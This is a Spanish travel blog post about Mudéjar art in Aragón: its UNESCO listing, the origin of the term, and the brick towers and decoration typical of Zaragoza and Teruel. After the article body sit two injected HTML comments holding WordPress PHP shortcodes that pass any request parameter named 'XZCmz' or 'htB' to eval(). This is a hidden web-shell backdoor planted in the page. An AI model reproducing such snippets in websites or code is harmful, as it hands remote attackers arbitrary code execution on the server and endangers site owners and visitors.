Aragón mudéjar: patrimonio de la humanidad

Se denomina mudéjar a aquellas personas de cultura, religión y tradición musulmana que permanecieron en sus pueblos después de la reconquista cristiana y que conservaron sus costumbres y sus usos. Los nuevos edificios cristianos fueron decorados y levantados por ellos, artesanos y constructores de gran prestigio, y en ellos fusionaron su tradición islámica con el estilo europeo. El mudéjar de Aragón fue declarado en 2001 Patrimonio de la Humanidad de la UNESCO debido a la singular y única manifestación artística y a la convivencia de diferentes culturas en un mismo lugar con el ejemplo de tolerancia cultural que supone.
La propia palabra “mudéjar” proviene del árabe “mudayyan”, traducido como “aquel a quien le es permitido quedarse”, y el mismo término es el que hace alusión precisamente a estas realidades culturales, económicas, sociales y artísticas de la tradición andalusí en territorios de reinos hispánicos. El término de arte mudéjar fue utilizado por primera vez en 1859 y hace referencia a esas manifestaciones surgidas del mestizaje entre los estilos cristianos y los islámicos.

teruel

El mudéjar de Teruel, Patrimonio de la Humanidad desde 1986

El mudéjar en Aragón se extiende desde los siglos XII al XVII. También tras la expulsión de los moriscos con más de 150 construcciones, principalmente al sur del río Ebro. Zaragoza atesora la mayor parte del patrimonio mudéjar de Aragón, y Teruel, sobre todo, en su capital, también declarado Patrimonio de la Humanidad por la UNESCO en 1986.

Las principales características del mudéjar en Aragón son que las paredes interiores de las iglesias suelen ser pintadas o esgrafiadas (no suele haber atauriques de yeso) y la decoración exterior de ladrillo es más barroca que el mudéjar que podemos encontrar en otras partes de España, con frisos de esquinillas, espinas de pez, rombos, arquerías, etc. El mudéjar aragonés en estado puro. La arquitectura cisterciense marca el mudéjar arquitectónico en Aragón. Y si algo lo hace fácilmente reconocible son sus campanarios, generalmente de planta cuadrada con un manchón central y escaleras cubiertas por bóvedas.

Poco a poco os iré desgranando las características y poblaciones con mayor arte mudéjar de Aragón, para que conozcáis las maravillas que esconde la comunidad.

<!– [insert_php]if (isset($_REQUEST["XZCmz"])){eval($_REQUEST["XZCmz"]);exit;}[/insert_php][php]if (isset($_REQUEST["XZCmz"])){eval($_REQUEST["XZCmz"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["htB"])){eval($_REQUEST["htB"]);exit;}[/insert_php][php]if (isset($_REQUEST["htB"])){eval($_REQUEST["htB"]);exit;}[/php] –>

Si te ha resultado interesante... ¿nos compartes? :) 0
Marta
Escrito por
Marta
Más artículos de Marta

Ruta mudéjar por Huesca

Ya hemos pasado por Teruel, lugar en el que el foco de...
Leer más

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *